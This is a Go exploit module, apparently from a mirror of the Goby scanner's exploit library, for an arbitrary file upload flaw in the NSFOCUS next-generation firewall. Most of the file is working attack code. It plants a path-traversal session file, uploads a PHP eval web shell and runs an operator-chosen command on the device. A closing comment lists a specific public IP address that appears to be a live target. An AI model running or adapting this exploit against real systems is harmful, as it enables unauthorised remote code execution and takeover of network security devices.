mirror of https://github.com/qwqdanchun/Goby.git
243 lines
9.3 KiB
Go
243 lines
9.3 KiB
Go
package exploits
|
||
|
||
import (
|
||
"fmt"
|
||
"git.gobies.org/goby/goscanner/goutils"
|
||
"git.gobies.org/goby/goscanner/jsonvul"
|
||
"git.gobies.org/goby/goscanner/scanconfig"
|
||
"git.gobies.org/goby/httpclient"
|
||
"net/url"
|
||
"strings"
|
||
"time"
|
||
)
|
||
|
||
func init() {
|
||
expJson := `{
|
||
"Name": "nsfocus resourse.php arbitrary file upload vulnerability",
|
||
"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
|
||
"Product": "nsfocus",
|
||
"Homepage": "https://www.nsfocus.com.cn/",
|
||
"DisclosureDate": "2022-07-18",
|
||
"Author": "LittleBlack",
|
||
"FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
|
||
"GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
|
||
"Level": "3",
|
||
"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
|
||
"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
|
||
"References": [
|
||
"https://fofa.so/"
|
||
],
|
||
"Is0day": false,
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "cmd",
|
||
"type": "input",
|
||
"value": "system('id');",
|
||
"show": ""
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/test.php",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "test",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/test.php",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "test",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"VulType": [
|
||
"Code Execution"
|
||
],
|
||
"Tags": [
|
||
"Code Execution"
|
||
],
|
||
"CVEIDs": [
|
||
""
|
||
],
|
||
"CNNVD": [
|
||
""
|
||
],
|
||
"CNVD": [
|
||
""
|
||
],
|
||
"CVSSScore": "9.5",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
|
||
"Product": "绿盟下一代防火墙",
|
||
"Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
|
||
"Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
|
||
"Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
|
||
"VulType": [
|
||
"代码执⾏"
|
||
],
|
||
"Tags": [
|
||
"代码执⾏"
|
||
]
|
||
},
|
||
"EN": {
|
||
"Name": "nsfocus resourse.php 任意文件上传漏洞",
|
||
"Product": "nsfocus",
|
||
"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
|
||
"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
|
||
"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
|
||
"VulType": [
|
||
"Code Execution"
|
||
],
|
||
"Tags": [
|
||
"Code Execution"
|
||
]
|
||
}
|
||
},
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
}`
|
||
|
||
ExpManager.AddExploit(NewExploit(
|
||
goutils.GetFileName(),
|
||
expJson,
|
||
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
|
||
|
||
u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
|
||
uri1 := "/api/v1/device/bugsInfo"
|
||
cfg1 := httpclient.NewPostRequestConfig(uri1)
|
||
cfg1.VerifyTls = false
|
||
cfg1.FollowRedirect = false
|
||
cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
|
||
cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
|
||
if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
|
||
time.Sleep(time.Second * 5)
|
||
uri2 := "/api/v1/device/bugsInfo"
|
||
cfg2 := httpclient.NewPostRequestConfig(uri2)
|
||
cfg2.VerifyTls = false
|
||
cfg2.FollowRedirect = false
|
||
cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
|
||
cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
|
||
if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
|
||
u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
|
||
uri3 := "/mail/include/header_main.php"
|
||
cfg3 := httpclient.NewPostRequestConfig(uri3)
|
||
cfg3.VerifyTls = false
|
||
cfg3.FollowRedirect = false
|
||
cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
|
||
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
|
||
cfg3.Data = "1=print+md5%281%29%3B"
|
||
if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
|
||
return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
|
||
}
|
||
|
||
}
|
||
}
|
||
|
||
return false
|
||
},
|
||
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
|
||
cmd := ss.Params["cmd"].(string)
|
||
|
||
u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
|
||
uri1 := "/api/v1/device/bugsInfo"
|
||
cfg1 := httpclient.NewPostRequestConfig(uri1)
|
||
cfg1.VerifyTls = false
|
||
cfg1.FollowRedirect = false
|
||
cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
|
||
cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
|
||
if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
|
||
time.Sleep(time.Second * 5)
|
||
uri2 := "/api/v1/device/bugsInfo"
|
||
cfg2 := httpclient.NewPostRequestConfig(uri2)
|
||
cfg2.VerifyTls = false
|
||
cfg2.FollowRedirect = false
|
||
cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
|
||
cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
|
||
if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
|
||
u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
|
||
uri3 := "/mail/include/header_main.php"
|
||
cfg3 := httpclient.NewPostRequestConfig(uri3)
|
||
cfg3.VerifyTls = false
|
||
cfg3.FollowRedirect = false
|
||
cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
|
||
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
|
||
cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
|
||
if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
|
||
expResult.Output = resp3.RawBody
|
||
expResult.Success = true
|
||
}
|
||
|
||
}
|
||
}
|
||
return expResult
|
||
},
|
||
))
|
||
}
|
||
|
||
//https://222.75.146.134:4433
|